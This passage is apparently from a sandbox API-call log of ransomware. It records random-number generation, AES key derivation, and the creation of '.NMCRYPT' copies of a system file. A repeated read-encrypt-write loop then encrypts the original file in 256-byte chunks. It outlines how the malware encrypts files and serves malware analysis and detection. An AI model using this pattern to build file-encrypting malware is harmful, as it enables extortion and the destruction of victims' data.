hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.478] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.478] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.479] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.479] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.479] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.479] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.479] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.479] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.479] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.479] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.479] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.479] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.479] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.479] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.479] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.479] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.479] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.479] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.479] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.479] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.479] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0163.479] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0163.480] CryptCreateHash (in: hProv=0x8e3770, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44483c | out: phHash=0x1d44483c) returned 1 [0163.480] CryptHashData (hHash=0x9ad7f8, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0163.480] CryptDeriveKey (in: hProv=0x8e3770, Algid=0x6610, hBaseData=0x9ad7f8, dwFlags=0x4, phKey=0x1d444840 | out: phKey=0x1d444840*=0x9ad278) returned 1 [0163.480] CryptSetKeyParam (hKey=0x9ad278, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0163.480] CryptSetKeyParam (hKey=0x9ad278, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0163.480] wcslen (_String="\\\\?\\") returned 0x4 [0163.480] CryptDuplicateKey (in: hKey=0x9ad278, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad2b8) returned 1 [0163.480] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\grid_(inch).wmf.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\grid_(inch).wmf.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0163.480] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\grid_(inch).wmf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\grid_(inch).wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0163.481] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=7498) returned 1 [0163.481] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0163.481] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.483] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.483] GetLastError () returned 0x0 [0163.483] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.565] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.565] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.565] GetLastError () returned 0x0 [0163.565] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.565] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.565] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.565] GetLastError () returned 0x0 [0163.565] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.565] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.565] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.565] GetLastError () returned 0x0 [0163.565] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.565] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.566] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.566] GetLastError () returned 0x0 [0163.566] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.566] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.566] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.566] GetLastError () returned 0x0 [0163.566] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.566] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.566] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.566] GetLastError () returned 0x0 [0163.566] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.566] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.566] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.566] GetLastError () returned 0x0 [0163.566] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.566] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.566] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.566] GetLastError () returned 0x0 [0163.566] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.566] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.566] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.566] GetLastError () returned 0x0 [0163.566] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.566] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.566] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.566] GetLastError () returned 0x0 [0163.566] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.567] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.567] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.567] GetLastError () returned 0x0 [0163.567] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.567] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.567] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.567] GetLastError () returned 0x0 [0163.567] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.567] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.567] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.567] GetLastError () returned 0x0 [0163.567] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.567] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.567] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.567] GetLastError () returned 0x0 [0163.567] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.567] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.567] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.567] GetLastError () returned 0x0 [0163.567] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.567] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.567] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.567] GetLastError () returned 0x0 [0163.567] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.568] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.568] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.568] GetLastError () returned 0x0 [0163.568] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.568] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.568] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.568] GetLastError () returned 0x0 [0163.568] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.568] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.568] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.568] GetLastError () returned 0x0 [0163.568] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.568] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.568] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.568] GetLastError () returned 0x0 [0163.568] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.568] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.568] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.568] GetLastError () returned 0x0 [0163.568] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.568] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.568] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.568] GetLastError () returned 0x0 [0163.568] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.568] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.568] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.568] GetLastError () returned 0x0 [0163.569] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.569] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.569] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.569] GetLastError () returned 0x0 [0163.569] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.569] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.569] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.569] GetLastError () returned 0x0 [0163.569] WriteFile (in: 